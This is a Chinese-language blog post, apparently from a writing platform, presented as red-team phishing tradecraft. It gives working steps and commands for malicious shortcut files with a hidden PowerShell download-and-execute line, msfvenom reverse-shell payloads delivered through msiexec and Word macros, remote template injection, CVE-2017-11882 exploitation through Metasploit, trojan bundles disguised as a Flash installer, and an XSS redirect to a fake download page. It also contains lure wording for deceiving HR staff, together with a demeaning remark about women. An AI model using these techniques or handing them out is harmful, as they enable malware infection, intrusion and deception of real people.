红队测试之钓鱼攻击的应用(一)

lik


link文件,即快捷方式

比如一个txt文件,我们创建一个它的快捷方式,然后修改它的目标地址:

这时可以看到它的ico图标被修改了,我们可以直接修改它的图标为txt类型的ico

但是⽤系统⾃带的ico去做⽂件图标替换的话,有个弊端,即当替换的ico在⽬标机器上不存在时,就会出现类似空⽩ico图标

在实施钓⻥过程中,我们可以在"⽬标"栏写⼊⾃⼰的恶意命令,如powershell上线命令:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.107.129:8006/a'))"

也可以使用msiexec.exe,系统进程,是Windows Installer的一部分,利用此进程来加载我们shellcode可以达到一定的规避作用。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.129 lport=6688 -f msi > shell.txt

c:\windows\system32\msiexec.exe /q /i http://xxx/shell.txt

Office钓鱼:


漏洞环境及利用工具:

1、Windows Server 2012 R2 x64
2、Office 2016
3、msf
4、CobaltStrike

基础了解:

宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上

Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件,也可说是一种应用程式视觉化的Basic 脚本。

常用的套路使对方开启宏:

  • 文档是被保护状态,需要启用宏才能查看;
  • 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
  • 提示要查看文档,按给出的一系列步骤操作;
  • 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。
利用过程:

1、CobaltStrike生成宏、msf生成宏:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.129 lport=6688 -f vba -o shellcode.txt

2、打开Word文档,点击 "Word 选项 — 自定义功能区 — 开发者工具(勾选) — 确定"

3、点击 “开发工具 — Visual Basic”,双击 “ThisDocument” ,将原有内容全部清空,然后将CobaltStrike生成宏payload全部粘贴进去,保存并关闭该 VBA 编辑器

4、另存为的Word类型务必要选”Word 97-2003 文档 (*.doc)”,即 doc 文件,保证低版本可以打开。之后关闭,再打开即可执行宏代码

默认情况下,Office已经禁用所有宏,在打开Word文档的时候发出通知。这是如果目标选择启用宏,CobaltStrike的Beacon就会上线

不足:宏代码是存在本地的,极易被杀软查杀

word插入外部对象:

这里可以修改成doc图标,改变题注,更加逼真。双击,选择确定,即可上线。

远程模板注入宏代码:


利用原理:

利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏

发送的文档本身是不带恶意代码的,能过很多静态的检测。只需要在远程DOTM文档中编写宏病毒或者宏木马即可完成攻击

利用过程:

1、编写一个带有宏代码的DOTM文档,上传服务器
2、编写一个能够远程连接的DOCX文档:
这里我们直接在网上找简历模板文件:

注意:不要编写纯文本的文档

将我们下载的docx文档压缩成zip格式,并解压查看其目录结构

右键选择"编辑",可以看到如下所示内容,其中,Target所指的路径即我们要修改的位置

将其修改为我们dotm文件所在的url

将其中所有目录及文件选中,点击右键压缩,选中压缩文件格式为zip
然后将其后缀名修改为docx,再将其打开

选择启用宏以后,远程服务器的模板成功加载:

CS成功上线:

CVE-2017-11882:


利用范围:

Office 2003到2016的所有版本

项目地址:https://github.com/Ridter/CVE-2017-11882

漏洞检验:

我们可以先弹出个计算器,测试是否存在漏洞:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

将生成的test.doc上传到目标主机,打开并观察是否存在漏洞

通过msf利用漏洞:

项目地址:https://github.com/0x09AL/CVE-2017-11882-metasploit

cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local/
cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/

# 打开msf,重新加载模块
reload_all

search cve_2017_11882

use exploit/windows/local/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set uripath test
set lhost 192.168.107.129
set lport 7777
exploit -j

另外打开一个终端,执行如下命令,生成恶意doc文件

python Command_CVE-2017-11882.py -c "mshta http://192.168.107.129:8080/test" -o test2.doc

将恶意doc文件上传到目标服务器并打开,成功上线:

那么现在的问题就是如何诱导用户点击运行宏呢?

试想以下场景:

通过简历投递发送给HR进行钓鱼,而HR大多数是女生,女生比较善良、不设防,又非技术人员,绝对是属于安全意识最薄弱的人之一

尝试手段:

简历背景为一个虚化的简历图片,然后在上方加入一段文字,告诉受害者:之所以简历看不清楚是因为你没有点击宏运行,要想看清,请点击运行宏

如下图所示:(图片来源于红蓝对抗之邮件钓鱼攻击

个人感觉还有很多话术待学习,真想找人试验一下~(提高HR的防钓鱼安全意识)

自解压捆绑文件的利用:


这里我们以flash钓鱼为例:

前期准备:

1、免杀马
2、域名注册
3、vps服务器

flash官网的钓鱼源码:
https://github.com/r00tSe7en/Fake-flash.cn

利用过程:

利用winrar实现捆绑:

1.准备好的木马和官网的flash安装程序
2.鼠标右键,添加到压缩文件。
3.选择"创建自解压格式压缩文件"
4.点击高级,选择"自解压选项"
5.解压路径为:C:\windows\temp
6.点击设置,提取后运行处填写:flash.exe、flashplayer_install_cn.exe
7.点击模式,选择"全部隐藏"
8.点击更新,选择"解压并更新文件"以及"覆盖所有文件"
9.点击确定,返回后修改压缩文件名,尽量逼真一些

使用ResourceHacker修改图标:

1.通过ResourceHacker打开原版的flash安装程序,点击Icon Group文件夹中的文件,鼠标右键保存“*.ico资源”,即可导出ico图标。
2.再利用ResourceHacker打开刚刚打包好的文件,点击Icon Group文件夹中的文件,鼠标右键替换ico图标,最后保存

最后实现的效果如图所示:

打开flash安装程序以后,木马已悄然上线~

上传fake网站的源码和刚刚做的捆绑木马至服务器,开放Web服务

利用XSS弹框提示钓鱼:

window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="http://x.x.x.x";

实现效果:

点击"确定"后,即跳转到精心伪造的Flash下载页面:

参考如下:


红蓝对抗之邮件钓鱼攻击
Office宏的基本利用
利用DOCX文档远程模板注入执行宏代码
Office钓鱼之传世经典CVE-2017-11882分析学习
Flash水坑钓鱼

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
禁止转载,如需转载请通过简信或评论联系作者。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,651评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,468评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,931评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,218评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,234评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,198评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,084评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,926评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,341评论 1 311
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,563评论 2 333
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,731评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,430评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,036评论 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,676评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,829评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,743评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,629评论 2 354